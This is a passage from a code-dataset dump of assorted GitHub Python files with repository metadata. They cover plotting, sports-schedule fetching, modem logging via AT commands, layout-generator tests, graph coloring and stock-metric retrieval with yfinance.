\"\"\n###print u.select_in_list([[12, 5], [7, 3, 3]], 0)\n###print \"\"\n###print \"----------pos_in_list------------------------\"\n###print \"\"\n##print u.pos_in_list([\"\", '', 7, 'None', 3])\n##print u.pos_none_in_list(['None', '', 7, 'None', 3])\n###print \"\"\n###print \"----------count_list_eq_v--------------------\"\n###print \"\"\n###print u.count_list_eq_v([12, 34, 78, 34, 12, \"a\", \"b\", \"a\"], 2)\n###print \"\"\n###print \"----------find_list_in_dict------------------\"\n###print \"\"\n###print u.find_list_in_dict({\"a\": [\"1\"], \"b\": [[12, 34]], \"c\": (1, 2, 3)})\n###print \"\"\n###print \"----------add_item_to_dict------------------\"\n###print \"\"\n#print u.add_item_to_dict( {\"a\": [1, 2, 3]}, [(\"b\", [4, 5, 6]), (\"c\",2)] )\n###print \"\"\n###print \"----------list_col_index_value------------------\"\n###print \"\"\n###print u.list_col_index_value([1, 2, 3, 4, \"a\", \"b\"], [5, 2, 7, 8, \"a\", \"d\"])\n###print \"\"\n###print \"----------deunicode_list------------------\"\n###print \"\"\n#print u.deunicode_list([u'\"1\"', u'\"2\"', u'\"\"\"b\"\"\"'])\n###print \"\"\n##print \"----------zip_lists------------------\"\n##print \"\"\n##print u.zip_lists([\"a\", \"b\", \"c\", 1, 3], [\"a\", \"b\", \"c\", 1, \"r\"])\n###print \"\"\n###print \"----------join_list_if------------------\"\n###print \"\"\n###print u.join_list_if([[1, \"b\", \"c\"], [\"d\", \"c\", \"e\"], [\"r\", \"d\", \"c\"]], [[\"1\", \"4\", \"2\"], [\"3\", \"b\", \"b\"], [\"a\", \"c\", \"6\"]],2,1)\n###print \"\"\n###print \"----------extract_from_list------------------\"\n###print \"\"\n###print u.extract_from_list([[1, 2, 3], [4, 5, 6]], 1)\n\n\n","repo_name":"lucaarcteam/qgis-archeos-plugin","sub_path":"debian/usr/share/archeos/qgis_archeos_plugin-0.1/python/plugins/pyarchinit/modules/db/pyarchinit_utility.py","file_name":"pyarchinit_utility.py","file_ext":"py","file_size_in_byte":7272,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"22"} +{"seq_id":"1121856925","text":"def pos_neg(value1, value2, negative):\n '''\n To define the function 'pos_neg' with 2 arguments in one parameter\n ''' \n if value1 >= 0 and value2 <= 0 and negative == False: # if value1 is positive, value 2 is negative and negative is false\n return True \n elif value1 <= 0 and value2 >= 0 and negative == False: # if value1 is negative, value2 is postive and negative is false\n return True\n elif value1 <= 0 and value2 <= 0 and negative == True: # if both are negative and negative is true \n return True\n else:\n return False\n\nprint(pos_neg(-1, 1, False)) # To print to call the function 'pos_neg'","repo_name":"Zasterify/Python-Practice","sub_path":"Example Problems/posit and negat.py","file_name":"posit and negat.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"2639094762","text":"import os, sys, inspect\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport pathlib\n\ncurrent_dir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))\nparent_dir = os.path.dirname(current_dir)\nsys.path.insert(0, parent_dir)\nfrom utils.color_print import ColorPrint\n\n\ndef __visualize(df, base_list, param_list, cond_list, base_col, param_col, cond_col, tps_col, plt_title, plt_name):\n # plt.figure()\n \n for n in base_list:\n for m in cond_list:\n # if not (abs(m) <= 1e-4 or abs(m - 0.7) <= 1e-4):\n # continue\n \n rows = df.loc[(df[base_col] == n) & (df[cond_col] == m)]\n rows = rows.sort_values(param_col)\n x = rows[param_col]\n y = rows[tps_col]\n \n plt.xlabel(param_col)\n plt.ylabel(tps_col)\n plt.title(f'{plt_title} for {base_col} = {n}')\n plt.plot(x, y, marker=\"o\")\n\n # plt.grid()\n plt.savefig(f\"{plt_name}_{base_col}={n}_{cond_col}={m}.png\")\n plt.figure()\n\n ColorPrint.print_info(f\"[Info]: Saving plot for {plt_title} for {base_col} = {n} and {cond_col}={m}\")\n \n plt.legend(cond_list, loc='best', title=cond_col)\n # plt.legend([0.0, 0.7], loc='best', title=cond_col)\n plt.grid(axis='y')\n # plt.savefig(f\"{plt_name}_{base_col}={n}.png\")\n # plt.show()\n \n\ndef visualize(filename, dir_name):\n df = pd.read_csv(filename)\n num_nodes = sorted(df['Number of nodes'].unique())\n cross_shard_tx_ratio = sorted(df['Fraction of cross-shard tx'].unique())\n num_shards = sorted(df['Number of shards'].unique())\n\n plt_name = f\"{dir_name}/shardsVsTPS\"\n __visualize(df, num_nodes, num_shards, cross_shard_tx_ratio, 'Number of nodes', 'Number of shards', \\\n 'Fraction of cross-shard tx', 'Processed TPS', 'Processed TPS vs Number of Shards', plt_name)\n\n plt_name = f\"{dir_name}/txRatioVsTPS\"\n __visualize(df, num_nodes, cross_shard_tx_ratio, num_shards, 'Number of nodes', 'Fraction of cross-shard tx', \\\n 'Number of shards', 'Processed TPS', 'fraction of cross-shard tx vs TPS', plt_name)\n \n\ndef main():\n if len(sys.argv) == 1:\n ColorPrint.print_fail(f\"\\n[Error]: log file not specified\")\n exit(1)\n\n filename = sys.argv[1]\n parent_dir_name = f\"logs_data/plots/{pathlib.PurePath(filename).parent.name}\"\n exact_filename = pathlib.PurePath(filename).name\n dir_name = f\"{parent_dir_name}/{exact_filename[:exact_filename.find('_')]}\"\n \n if not os.path.exists(dir_name):\n ColorPrint.print_info(f\"[Info]: Creating directory '{dir_name}' for storing plots\")\n pathlib.Path(dir_name).mkdir(parents=True, exist_ok=True)\n \n visualize(filename, dir_name)\n print(\"\\n\")\n\n\nif __name__==\"__main__\":\n main()","repo_name":"vishishtpriyadarshi/ShardEval","sub_path":"analyzer/visualizer.py","file_name":"visualizer.py","file_ext":"py","file_size_in_byte":2851,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"22"} +{"seq_id":"39054773387","text":"from datetime import datetime\nfrom urllib import parse\nfrom requests import Response, get\n\nfrom shared_items.utils import pp, measure_execution, try_it\nfrom constants import TAB\n\nfrom models.nhl import LeagueBroadcastSchedule, Game as LeagueGame\nfrom models.nhl_espn import DailyEspnPlusNhlSchedule, Event as PowerPlayGame\nfrom shared import ElligibleSportsEnum, NotionSportsScheduleItem, log_good_networks\nfrom utils import NotionScheduler\nfrom utils.assemblers import NhlAssembler, NhlEspnPlusAssembler\n\n\ndef assemble_league_schedule_url() -> str:\n todays_date = datetime.today().strftime(\"%Y-%m-%d\")\n return f\"https://api-web.nhle.com/v1/schedule/{todays_date}\"\n\n\ndef assemble_power_play_schedule_url() -> str:\n power_play_schedule_base_url = (\n \"https://site.web.api.espn.com/apis/v2/scoreboard/header?\"\n )\n power_play_schedule_params = (\n (\"sport\", \"hockey\"),\n (\"league\", \"nhl\"),\n (\"region\", \"us\"),\n (\"lang\", \"en\"),\n (\"contentorigin\", \"espn\"),\n (\"buyWindow\", \"1m\"),\n (\"showAirings\", \"buy,live,replay\"),\n (\"showZipLookup\", \"true\"),\n (\"tz\", \"America/Indianapolis\"),\n )\n return power_play_schedule_base_url + parse.urlencode(power_play_schedule_params)\n\n\n@measure_execution(f\"{TAB}fetching new NHL schedule\")\ndef fetch_schedule_json() -> dict:\n url = assemble_league_schedule_url()\n schedule_response: Response = get(url)\n return schedule_response.json()\n\n\n@measure_execution(f\"{TAB}fetching new NHL PowerPlay schedule\")\ndef fetch_power_play_json() -> dict:\n url = assemble_power_play_schedule_url()\n power_play_schedule_response: Response = get(url)\n return power_play_schedule_response.json()\n\n\ndef assemble_usable_events(schedule_json: dict) -> list[LeagueGame]:\n league_broadcast_schedule = LeagueBroadcastSchedule(**schedule_json)\n return league_broadcast_schedule.usable_events()\n\n\ndef assemble_usable_power_play_games(\n power_play_schedule_json: dict,\n) -> list[PowerPlayGame]:\n power_play_nhl_schedule = DailyEspnPlusNhlSchedule(**power_play_schedule_json)\n return power_play_nhl_schedule.usable_events()\n\n\ndef assemble_notion_items(\n league_games: list[LeagueGame], power_play_games: list[PowerPlayGame]\n) -> list[NotionSportsScheduleItem]:\n # today = datetime.combine(datetime.today(), datetime.min.time()).astimezone()\n\n assembled_items = [\n NhlAssembler(game).notion_sports_schedule_item()\n for game in league_games\n if game.gameState in [\"LIVE\", \"FUT\"]\n ]\n assembled_power_play_items = [\n NhlEspnPlusAssembler(game).notion_sports_schedule_item()\n for game in power_play_games\n ]\n return sorted(assembled_items + assembled_power_play_items, key=lambda x: x.date)\n\n\n@try_it\ndef schedule_nhl():\n schedule_json = fetch_schedule_json()\n power_play_schedule_json = fetch_power_play_json()\n usable_events = assemble_usable_events(schedule_json)\n usable_power_play_games = assemble_usable_power_play_games(power_play_schedule_json)\n combined_items = assemble_notion_items(usable_events, usable_power_play_games)\n\n log_good_networks(combined_items)\n\n NotionScheduler(ElligibleSportsEnum.NHL.value, combined_items).schedule()\n\n\nif __name__ == \"__main__\":\n schedule_nhl()\n","repo_name":"marker004/notion-sports-schedules","sub_path":"app/nhl_schedule.py","file_name":"nhl_schedule.py","file_ext":"py","file_size_in_byte":3280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"18500252134","text":"\"\"\"\nThis code can use moxa device command to do some function.\n\"\"\"\nimport os\nfrom subprocess import PIPE, run\nimport time\nimport datetime as dt\ndef out(command):\n result = run(command, stdout=PIPE, stderr=PIPE, universal_newlines=True, shell=True)\n return result.stdout\n\n\n# select prefered band. select LTE or NR\ndef init():\n z = out(r\"mxat -d /dev/ttyUSB2 -c ATE1\")\n print(z)\n z = out(r\"mxat -d /dev/ttyUSB2 -c AT+QNWPREFCFG=\\\"nsa_nr5g_band\\\"\")\n print(z)\n # z = out(r\"mxat -d /dev/ttyUSB2 -c AT+QNWPREFCFG=\\\"lte_band\\\",28\")\n print(z)\n\n\n# record the timing and cell infomation\ndef record():\n f1 = open(\"enable\")\n n = 0\n t = dt.datetime.today()\n w = '-'.join([str(x) for x in[ t.year, t.month, t.day, t.hour, t.minute, t.second]])\n f = open('./device_log/log_'+w, 'a')\n while f1.readline() == 'true\\n':\n if n % 10 == 0:\n print(\"recording...\")\n f.write('time,'+str(dt.datetime.today())+ '\\n')\n z = out(r\"mxat -d /dev/ttyUSB2 -c at+qeng=\\\"servingcell\\\"\")\n f.write(z)\n z = out(r\"mxat -d /dev/ttyUSB2 -c at+qeng=\\\"neighbourcell\\\"\")\n f.write(z)\n n += 1\n# time.sleep(0.1)\n f1 = open(\"enable\")\n\n","repo_name":"Jackbedford0428/wmnl-handoff-research","sub_path":"others/handoff_study-main/moxa_device/device.py","file_name":"device.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"31647715822","text":"import os\nimport pathlib\nimport pytest\nfrom .utils import get_test_id, WORK_DIR\nimport importlib\nimport json\n\n\ndef check_shorts(pdk, cmdlist, constraints):\n spec = importlib.util.spec_from_file_location(\"Align_primitives\", pdk / 'Align_primitives.py')\n module = importlib.util.module_from_spec(spec)\n spec.loader.exec_module(module)\n main = getattr(module, \"main\")\n gen_parser = getattr(module, \"gen_parser\")\n parser = gen_parser()\n args = parser.parse_args(cmdlist)\n if constraints[0][\"parameters\"].get(\"height\", None) == 24:\n with pytest.raises(AssertionError):\n uc = main(args)\n return\n else:\n uc = main(args)\n assert len(uc.rd.shorts) == 0, uc.rd.shorts # rd = RemoveDuplicates\n assert len(uc.rd.opens) == 0, uc.rd.opens\n assert len(uc.rd.different_widths) == 0, uc.rd.different_widths\n assert len(uc.rd.subinsts) == 2 * args.Xcells * args.Ycells, uc.rd.subinsts\n common_centroid = set(['M1_X0_Y0', 'M2_X1_Y0', 'M2_X2_Y0', 'M1_X3_Y0', 'M2_X0_Y1',\n 'M1_X1_Y1', 'M1_X2_Y1', 'M2_X3_Y1'])\n if constraints[0][\"parameters\"].get(\"pattern\", None) == \"cc\":\n assert uc.rd.subinsts.keys() == common_centroid, f\"common centroid should be ABBA\"\n elif constraints[0][\"parameters\"].get(\"pattern\", None) == \"ncc\":\n assert uc.rd.subinsts.keys() == set(['M1_X0_Y0', 'M1_X1_Y0', 'M2_X2_Y0', 'M2_X3_Y0', 'M1_X0_Y1',\n 'M1_X1_Y1', 'M2_X2_Y1', 'M2_X3_Y1']), f\"non common centroid should be AABB\"\n elif constraints[0][\"parameters\"].get(\"pattern\", None) == \"id\":\n assert uc.rd.subinsts.keys() == set(['M1_X0_Y0', 'M2_X1_Y0', 'M1_X2_Y0', 'M2_X3_Y0', 'M2_X0_Y1',\n 'M1_X1_Y1', 'M2_X2_Y1', 'M1_X3_Y1']), f\"inter digitated pattern should be ABAB\"\n elif constraints[0][\"parameters\"].get(\"shared_diff\", None) == True:\n assert uc.rd.subinsts.keys() == common_centroid, f\"common centroid should be ABBA\"\n assert uc.rd.canvas.bbox.toList() == [0, 0, 1120, 3528], \"shared device should have smaller area\"\n elif constraints[0][\"parameters\"].get(\"shared_diff\", None) == False:\n assert uc.rd.subinsts.keys() == common_centroid, f\"common centroid should be ABBA\"\n assert uc.rd.canvas.bbox.toList() == [0, 0, 2560, 3528]\n elif constraints[0][\"parameters\"].get(\"body\", None) == True:\n assert uc.rd.subinsts.keys() == common_centroid, f\"common centroid should be ABBA\"\n assert uc.rd.canvas.bbox.toList() == [0, 0, 1120, 3528]\n elif constraints[0][\"parameters\"].get(\"body\", None) == False:\n assert uc.rd.subinsts.keys() == common_centroid, f\"common centroid should be ABBA\"\n assert uc.rd.canvas.bbox.toList() == [0, 0, 1120, 2352]\n assert all(len(x.pins) == 3 for x in uc.rd.subinsts.values()), uc.rd.subinsts\n elif constraints[0][\"parameters\"].get(\"height\", None) == 36:\n assert uc.rd.subinsts.keys() == common_centroid, f\"common centroid should be ABBA\"\n assert uc.rd.canvas.bbox.toList() == [0, 0, 1120, 4536]\n if constraints[0][\"parameters\"].get(\"body\", None) != False:\n assert all(len(x.pins) == 4 for x in uc.rd.subinsts.values()), uc.rd.subinsts\n assert len(uc.drc.errors) == 0, uc.drc.errors\n\n\ndef build_test(pdk, prim, *, n, X, Y, constraints):\n b = f\"{prim}_n{n}_X{X}_Y{Y}\"\n cwd = pathlib.Path(os.getcwd())\n with open(cwd / f'{prim}.const.json', 'w') as fp:\n fp.write(json.dumps(constraints, indent=2))\n check_shorts(pdk, ['-p', prim, '-b', b, '-n', f\"{n}\", '-X', f\"{X}\", '-Y', f\"{Y}\", '-c', f\"{cwd}\", '-o', f\"{cwd}\"], constraints)\n\n\nsupported_const = [{\"constraint\": \"Generator\", \"name\": \"MOS\", \"parameters\": {\"pattern\": \"cc\"}},\n {\"constraint\": \"Generator\", \"name\": \"MOS\", \"parameters\": {\"pattern\": \"ncc\"}},\n {\"constraint\": \"Generator\", \"name\": \"MOS\", \"parameters\": {\"pattern\": \"id\"}},\n {\"constraint\": \"Generator\", \"name\": \"MOS\", \"parameters\": {\"shared_diff\": True}},\n {\"constraint\": \"Generator\", \"name\": \"MOS\", \"parameters\": {\"shared_diff\": False}},\n {\"constraint\": \"Generator\", \"name\": \"MOS\", \"parameters\": {\"body\": True}},\n {\"constraint\": \"Generator\", \"name\": \"MOS\", \"parameters\": {\"body\": False}},\n {\"constraint\": \"Generator\", \"name\": \"MOS\", \"parameters\": {\"height\": 24}},\n {\"constraint\": \"Generator\", \"name\": \"MOS\", \"parameters\": {\"height\": 36}}\n ]\n\n\n@pytest.mark.parametrize(\"const\", supported_const)\ndef test_mos_finfet_const(const):\n pdk = pathlib.Path(__file__).parent.parent.parent / 'pdks' / 'FinFET14nm_Mock_PDK'\n test_dir = WORK_DIR / \"mos_finfet\" / get_test_id()\n test_dir.mkdir(parents=True, exist_ok=True)\n os.chdir(test_dir)\n x = 2\n y = 2\n nfins = 12\n prim = 'DP_NMOS'\n build_test(pdk, prim, n=nfins, X=x, Y=y, constraints=[const])\n\n\n@pytest.mark.parametrize(\"const\", supported_const[0:3])\ndef test_mos_bulk_const(const):\n pdk = pathlib.Path(__file__).parent.parent.parent / 'pdks' / 'Bulk65nm_Mock_PDK'\n test_dir = WORK_DIR / \"mos_bulk\" / get_test_id()\n test_dir.mkdir(parents=True, exist_ok=True)\n os.chdir(test_dir)\n x = 2\n y = 2\n nfins = 12\n prim = 'DP_NMOS'\n build_test(pdk, prim, n=nfins, X=x, Y=y, constraints=[const])\n","repo_name":"ALIGN-analoglayout/ALIGN-public","sub_path":"tests/pdks/test_constrained_generator.py","file_name":"test_constrained_generator.py","file_ext":"py","file_size_in_byte":5368,"program_lang":"python","lang":"en","doc_type":"code","stars":208,"dataset":"github-code","pt":"22"} +{"seq_id":"11762514984","text":"from pathlib import Path\n\nimport numpy\n\nfrom seqvec_search import mmseqs\nfrom seqvec_search.data import LoadedData\nfrom seqvec_search.main import faiss_search, evaluate_faiss, evaluate\n\n\ndef test_search_ann():\n data = LoadedData.from_options(path=Path(\"test-data/small-random\"), hits=5)\n queries = numpy.load(str(data.test))\n results, scores, search_time = faiss_search(\n numpy.load(str(data.train)), queries, data.hits\n )\n auc1s, tps = evaluate_faiss(data, results)\n assert auc1s == [1.0, 1 / 3, 2 / 3, 0.0, 0.0, 1 / 3]\n assert tps == [1.0, 2 / 3, 2 / 3, 1.0, 1.0, 1.0]\n\n\ndef test_ann_alignment():\n data = LoadedData.from_options(path=Path(\"test-data/pfam-20-10\"), hits=10)\n queries = numpy.load(str(data.test))\n results, scores, _ = faiss_search(numpy.load(str(data.train)), queries, data.hits)\n auc1s_ann, tps_ann = evaluate_faiss(data, results)\n assert numpy.mean(auc1s_ann) == 0.871\n assert numpy.mean(tps_ann) == 0.91\n\n mmseqs.write_prefilter_db_data(\n data, numpy.arange(queries.shape[0]), results, scores\n )\n mmseqs.align(data)\n hits = mmseqs.read_result_db(data, data.mmseqs_dir.joinpath(\"result_combined\"))\n\n # noinspection PyTypeChecker\n auc1s_ann_alignment, tps_ann_alignment = evaluate(data, hits.items())\n assert numpy.mean(auc1s_ann_alignment) == 0.8925\n assert numpy.mean(tps_ann_alignment) == 0.91\n","repo_name":"konstin/knn-for-homology","sub_path":"tests/test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"22"} +{"seq_id":"2749809861","text":"persons = [\n {\n 'firstname': 'Roberto',\n 'lastname': 'Ruiz',\n 'age': 34,\n }\n]\n\npersons.append({\n 'firstname': 'Arelbis',\n 'lastname': 'Carpio',\n 'age': 29,\n})\n\nperson = {}\nperson['firstname'] = 'Ashley'\nperson['lastname'] = 'Ruiz'\nperson['age'] = 4\n\npersons.append(person)\n\nprint(persons)\n","repo_name":"rarc88/microsoft-python-basic","sub_path":"011_collections.py","file_name":"011_collections.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"34661871752","text":"import networkx as nx\nfrom sympy import Symbol, symbols, Dummy, roots, solve\n\nfrom bokeh.plotting import figure, gridplot, GridSpec, output_file, show\n\ndef graph_draw(g, layout=nx.circular_layout, node_color=\"white\", text_color=\"black\"):\n pos = layout(g)\n labels = [ str(v) for v in g.nodes() ]\n vx, vy = zip(*[ pos[v] for v in g.nodes() ])\n xs, ys = [], []\n for (a, b) in g.edges():\n x0, y0 = pos[a]\n x1, y1 = pos[b]\n xs.append([x0, x1])\n ys.append([y0, y1])\n f = figure(plot_width=300, plot_height=300,\n x_axis_type=None, y_axis_type=None,\n outline_line_color=None,\n tools=[], toolbar_location=None)\n f.multi_line(xs, ys, line_color=\"black\")\n f.circle(vx, vy, size=16, line_color=\"black\", fill_color=node_color)\n f.text(vx, vy, text=labels, text_color=text_color,\n text_font_size=\"10px\", text_align=\"center\", text_baseline=\"middle\")\n return f\n\nV = range(1, 12+1)\nE = [(1,2),(2,3),(1,4),(1,6),(1,12),(2,5),(2,7),(3,8),(3,10),(4,11),(4,9),(5,6),\n (6,7),(7,8),(8,9),(9,10),(10,11),(11,12),(5,12),(5,9),(6,10),(7,11),(8,12)]\n\ng = nx.Graph()\ng.add_nodes_from(V)\ng.add_edges_from(E)\n\nVx = [ Symbol('x%d' % i) for i in V ]\nEx = [ (Vx[i-1], Vx[j-1]) for i, j in E ]\nF3 = [ xi**3 - 1 for xi in Vx ]\nFg = [ xi**2 + xi*xj + xj**2 for xi, xj in Ex ]\nFx = F3 + Fg\n\ncolors = symbols('red,green,blue')\nroots_of_unity = roots(Dummy()**3 - 1, multiple=True)\ncolor_map = dict(zip(roots_of_unity, colors))\nsolutions = solve(Fx, *Vx)\ncolorings = [ [ color_map.get(zeta) for zeta in solution ] for solution in solutions ]\n\nn, ncols = len(colorings), 2\ngs = GridSpec((n + 1)//ncols, 1 + ncols)\ngs[0, 0] = graph_draw(g)\n\nfor i, coloring in enumerate(colorings):\n f = graph_draw(g, node_color=[ str(color) for color in coloring ], text_color=\"white\")\n gs[i//ncols, 1 + i%ncols] = f\nplot = gridplot(gs, toolbar_location=None)\n\noutput_file(\"graphs.html\", title=\"Graph k-coloring with computer algebra\")\nshow(plot)\n","repo_name":"marcottelab/protein_complex_maps","sub_path":"protein_complex_maps/plant_map_website/graphs.py","file_name":"graphs.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"22"} +{"seq_id":"74038047416","text":"import yfinance as yf\r\n\r\nclass Stock:\r\n def __init__(self, ticker): \r\n\r\n num_dp = 3\r\n \r\n # setting up the below metrics\r\n self.obj = yf.Ticker(f'{ticker}')\r\n self.info = self.obj.info\r\n \r\n # stock price metrics\r\n self.ticker = ticker\r\n self.price = float(self.info['currentPrice']) if self.info['currentPrice'] is not None else None\r\n self.marketCap = float(self.info['marketCap']) if self.info['marketCap'] is not None else None\r\n self.numShares = float(self.info['sharesOutstanding']) if self.info['sharesOutstanding'] is not None else None\r\n self.yearlyLowPrice = float(self.info['fiftyTwoWeekLow']) if self.info['fiftyTwoWeekLow'] is not None else None\r\n self.yearlyHighPrice = float(self.info['fiftyTwoWeekHigh']) if self.info['fiftyTwoWeekHigh'] is not None else None\r\n self.fiftyDayMA = float(self.info['fiftyDayAverage']) if self.info['fiftyDayAverage'] is not None else None\r\n self.twoHundredDayMA = float(self.info['twoHundredDayAverage']) if self.info['twoHundredDayAverage'] is not None else None\r\n\r\n # value metrics\r\n self.acquirersMultiple = round(float(self.info['enterpriseValue'] / self.info['netIncomeToCommon']), num_dp) if (self.info['enterpriseValue'] / self.info['netIncomeToCommon']) is not None else None\r\n self.currentRatio = round(float(self.info['currentRatio']), num_dp) if self.info['currentRatio'] is not None else None\r\n self.enterpriseValue = round(float(self.info['enterpriseValue']), num_dp) if self.info['enterpriseValue'] is not None else None\r\n self.eps = round(float(self.info['trailingEps']), num_dp) if self.info['trailingEps'] is not None else None\r\n self.evToEBITDA = round(float(self.info['enterpriseToEbitda']), num_dp) if self.info['enterpriseToEbitda'] is not None else None\r\n self.evToOperatingCashFlow = round(float(self.info['enterpriseValue'] / self.info['operatingCashflow']), num_dp) if (self.info['enterpriseValue'] / self.info['operatingCashflow']) is not None else None\r\n self.evToRev = round(float(self.info['enterpriseToRevenue']), num_dp) if self.info['enterpriseToRevenue'] is not None else None\r\n self.peRatioTrail = round(float(self.info['trailingPE']), num_dp) if self.info['trailingPE'] is not None else None\r\n self.peRatioForward = round(float(self.info['forwardPE']), num_dp) if self.info['forwardPE'] is not None else None\r\n self.priceToSales = round(float(self.info['priceToSalesTrailing12Months']), num_dp) if self.info['priceToSalesTrailing12Months'] is not None else None\r\n self.priceToBook = round(float(self.info['priceToBook']), num_dp) if self.info['priceToBook'] is not None else None\r\n\r\n # dividend metrics\r\n self.dividendYield = float(self.info['trailingAnnualDividendYield']) if self.info['trailingAnnualDividendYield'] is not None else None\r\n self.dividendRate = float(self.info['dividendRate']) if self.info['dividendRate'] is not None else None\r\n self.exDivDate = str(self.info['exDividendDate']) if self.info['exDividendDate'] is not None else None\r\n self.lastDivVal = float(self.info['lastDividendValue']) if self.info['lastDividendValue'] is not None else None\r\n self.payoutRatio = str(self.info['payoutRatio']) if self.info['payoutRatio'] is not None else None\r\n\r\n # # balance sheet metrics\r\n self.bookValue = round(float(self.info['bookValue']), num_dp) if self.info['bookValue'] is not None else None\r\n self.bookValPerShare = round(float(self.info['bookValue'] / self.info['sharesOutstanding']), num_dp) if (self.info['bookValue'] / self.info['sharesOutstanding']) is not None else None\r\n self.cash = round(float(self.info['totalCash']), num_dp) if self.info['totalCash'] is not None else None\r\n self.cashPerShare = round(float(self.info['totalCashPerShare']), num_dp) if self.info['totalCashPerShare'] is not None else None\r\n self.cashToMarketCap = round(float(self.info['totalCash'] / self.info['marketCap']), num_dp) if (self.info['totalCash'] / self.info['marketCap']) is not None else None\r\n self.cashToDebt = round(float(self.info['totalCash'] / self.info['totalDebt']), num_dp) if (self.info['totalCash'] / self.info['totalDebt']) is not None else None\r\n self.debt = round(float(self.info['totalDebt']), num_dp) if self.info['totalDebt'] is not None else None\r\n self.debtToMarketCap = round(float(self.info['totalDebt'] / self.info['marketCap']), num_dp) if (self.info['totalDebt'] / self.info['marketCap']) is not None else None\r\n self.debtToEquityRatio = round(float(self.info['debtToEquity']), num_dp) if self.info['debtToEquity'] is not None else None\r\n self.quickRatio = round(float(self.info['quickRatio']), num_dp) if self.info['quickRatio'] is not None else None\r\n self.returnOnAssets = round(float(self.info['returnOnAssets']), num_dp) if self.info['returnOnAssets'] is not None else None\r\n self.returnOnEquity = round(float(self.info['returnOnEquity']), num_dp) if self.info['returnOnEquity'] is not None else None\r\n self.totalAssets = round(float(self.info['totalAssets']), num_dp) if self.info['totalAssets'] is not None else None\r\n\r\n # income related\r\n self.ebitda = round(float(self.info['ebitda']), num_dp) if self.info['ebitda'] is not None else None\r\n self.ebitdaMargins = round(float(self.info['ebitdaMargins']), num_dp) if self.info['ebitdaMargins'] is not None else None\r\n self.ebitdaPerShare = round(float(self.info['ebitda']), num_dp) if self.info['ebitda'] is not None else None\r\n self.earningsGrowth = round(float(self.info['earningsGrowth']), num_dp) if self.info['earningsGrowth'] is not None else None\r\n self.grossMargins = round(float(self.info['grossMargins']), num_dp) if self.info['grossMargins'] is not None else None\r\n self.grossProfit = round(float(self.info['grossProfits']), num_dp) if self.info['grossProfits'] is not None else None\r\n self.grossProfitPerShare = round(float(self.info['grossProfits'] / self.info['sharesOutstanding']), num_dp) if (self.info['grossProfits'] / self.info['sharesOutstanding']) is not None else None\r\n self.netIncome = round(float(self.info['netIncomeToCommon']), num_dp) if self.info['netIncomeToCommon'] is not None else None\r\n self.netIncomePerShare = round(float(self.info['netIncomeToCommon'] / self.info['sharesOutstanding']), num_dp) if (self.info['netIncomeToCommon'] / self.info['sharesOutstanding']) is not None else None\r\n self.operatingMargin = round(float(self.info['operatingMargins']), num_dp) if self.info['operatingMargins'] is not None else None\r\n self.profitMargin = round(float(self.info['profitMargins']), num_dp) if self.info['profitMargins'] is not None else None\r\n self.revenue = round(float(self.info['totalRevenue']), num_dp) if self.info['totalRevenue'] is not None else None\r\n self.revenueGrowth = round(float(self.info['revenueGrowth']), num_dp) if self.info['revenueGrowth'] is not None else None\r\n self.revenuePerShare = round(float(self.info['revenuePerShare'] / self.info['sharesOutstanding']), num_dp) if (self.info['revenuePerShare'] / self.info['sharesOutstanding']) is not None else None\r\n\r\n # cash flow related\r\n self.fcf = round(float(self.info['freeCashflow']), num_dp) if self.info['freeCashflow'] is not None else None\r\n self.fcfToMarketCap = round(float(self.info['freeCashflow'] / self.info['marketCap']), num_dp) if (self.info['freeCashflow'] / self.info['marketCap']) is not None else None\r\n self.fcfPerShare = round(float(self.info['freeCashflow'] / self.info['sharesOutstanding']), num_dp) if (self.info['freeCashflow'] / self.info['sharesOutstanding']) is not None else None\r\n self.ocf = round(float(self.info['operatingCashflow']), num_dp) if self.info['operatingCashflow'] is not None else None\r\n self.ocfToRevenueRatio = round(float(self.info['operatingCashflow'] / self.info['totalRevenue']), num_dp) if (self.info['operatingCashflow'] / self.info['totalRevenue']) is not None else None\r\n self.ocfToMarketCap = round(float(self.info['operatingCashflow'] / self.info['marketCap']), num_dp) if (self.info['operatingCashflow'] / self.info['marketCap']) is not None else None\r\n self.ocfPerShare = round(float(self.info['operatingCashflow'] / self.info['sharesOutstanding']), num_dp) if (self.info['operatingCashflow'] / self.info['sharesOutstanding']) is not None else None\r\n self.fcfToEV = round(float(self.info['freeCashflow'] / self.info['enterpriseValue']), num_dp) if (self.info['freeCashflow'] / self.info['enterpriseValue']) is not None else None\r\n self.ocfToEV = round(float(self.info['operatingCashflow'] / self.info['enterpriseValue']), num_dp) if (self.info['operatingCashflow'] / self.info['enterpriseValue']) is not None else None\r\n\r\n def __repr__(self):\r\n return self\r\n\r\n def __str__(self):\r\n return self \r\n\r\n def get_all_keys(self):\r\n \"\"\"\r\n returns all possible keys that is available to the developer\r\n \"\"\"\r\n for i in self.info.keys():\r\n print(i)\r\n\r\n def print_all_class_properties(self):\r\n \"\"\"\r\n prints all properties\r\n \"\"\"\r\n print(', '.join(\"%s: %s\" % item for item in vars(Stock(f'{self.ticker}')).items()))\r\n\r\n\r\n","repo_name":"Alex-Jarosz-1996/yf_us","sub_path":"src/YahooFinanceScreenerClass.py","file_name":"YahooFinanceScreenerClass.py","file_ext":"py","file_size_in_byte":9812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"5954379880","text":"import pandas as pd\nimport numpy as np\nimport os\nfrom transformers import AutoTokenizer\nimport re\nfrom prcs import digit_place_embed\nfrom functools import partial\nimport tqdm\n\ndef pad_list(lst : 